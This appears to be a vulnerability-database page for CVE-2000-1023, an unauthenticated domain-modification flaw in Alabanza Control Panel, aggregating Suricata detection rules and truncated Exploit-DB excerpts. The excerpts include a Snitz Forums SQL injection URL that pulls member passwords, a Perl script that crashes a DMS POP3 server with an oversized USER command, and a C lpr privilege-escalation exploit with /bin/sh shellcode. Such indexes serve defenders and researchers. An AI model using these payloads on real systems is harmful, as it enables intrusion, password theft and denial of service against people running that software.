CVE-2000-1023
published 2000-12-11CVE-2000-1023: The Alabanza Control Panel does not require passwords to access administrative commands, which allows remote attackers to modify domain name information via…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
8.64%
94.4th percentile
The Alabanza Control Panel does not require passwords to access administrative commands, which allows remote attackers to modify domain name information via the nsManager.cgi CGI program.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alabanza | control_panel | <= 3.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id ASCII"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/ASCII\(.+SELECT/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004867; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tech
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id DELETE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; pcre:"/DELETE.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004866; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; pcre:"/UPDATE.+SET/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004868; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techni
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id SELECT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; pcre:"/SELECT.+FROM/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004863; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id INSERT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"INSERT"; nocase; pcre:"/INSERT.+INTO/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004865; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1023 [HIGH] ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT
ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UNION SELECT"; flow:established,to_server; http.uri; content:"/pop_profile.asp?"; nocase; content:"id="; nocase; content:"UNION"; nocase; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1023; reference:url,www.milw0rm.com/exploits/3321; classtype:web-application-attack; sid:2004864; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access
Exploit-DB
Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
exploitdb·2007-03-07
CVE-2006-0476 Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
---
#!/usr/bin/perl -w
# ===============================================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# By Umesh Wanve ([email protected])
# ===========================================================================================================================
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer = "\x90 x 1023" + EIP
#
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes. When you debug it,
Exploit-DB
Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
exploitdb·2007-02-16
CVE-2007-1023 Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
---
=================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N=================================
Bulan: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N=================================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X
Exploit-DB
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
exploitdb·2004-11-21
CVE-2004-1533 DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow
---
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
sleep(1);
print $socket "USER " . "A" x 1023;
close $socket;
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP
Exploit-DB
Alabanza Control Panel 3.0 - Domain Modification
exploitdb·2000-09-24
CVE-2000-1023 Alabanza Control Panel 3.0 - Domain Modification
Alabanza Control Panel 3.0 - Domain Modification
---
source: https://www.securityfocus.com/bid/1710/info
Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.
Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.
Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).
To add a domain to the name server (using example.com as an example and 'target' b
Exploit-DB
BSD / Linux - 'lpr' Local Privilege Escalation
exploitdb·1996-10-25
CVE-2000-1220 BSD / Linux - 'lpr' Local Privilege Escalation
BSD / Linux - 'lpr' Local Privilege Escalation
---
-------------------------------------- linux_lpr_exploit.c ----------
#include
#include
#include
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
void main()
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i BUFSIZ-2) /* !! */
{ /* !! */
printf("No, thanks..
No writeups or analysis indexed.
2000-12-11
Published